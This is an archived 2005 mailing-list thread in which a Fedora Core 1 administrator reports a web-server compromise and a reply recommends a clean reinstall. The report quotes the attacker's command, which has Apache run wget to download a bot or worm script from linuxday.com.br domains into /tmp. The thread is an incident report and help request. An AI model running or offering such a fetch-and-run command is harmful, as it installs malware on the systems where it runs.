On 02/17/2005 10:20:02 PM, paul@xxxxxxxxxxxxxxxxxxx wrote:
Apparently someone has hacked into my webserver. And is installing perl scripts into he /tmp/ directory. There usually named .linuxday* or .cinta* and a few other names as well.
>From what I can tell something is causing apache to run a command like "sh wget bot.linuxday.com.br -O {the above mentioned files are than listed}"
sometimes the site is worm.linuxday.com.br
I'm curious if anyone has heard about this before. I'm currently running Fedora 1 with all the latests security patches.
It might not be a vulnerable package, it might be vulnerable code on your server.
Anyway - you've been compromised which means you probably have already had trojans installed - a clean install would be a good idea - and I would suggest something not legacy. IE fc3.
-- Michael A. Peters http://mpeters.us/
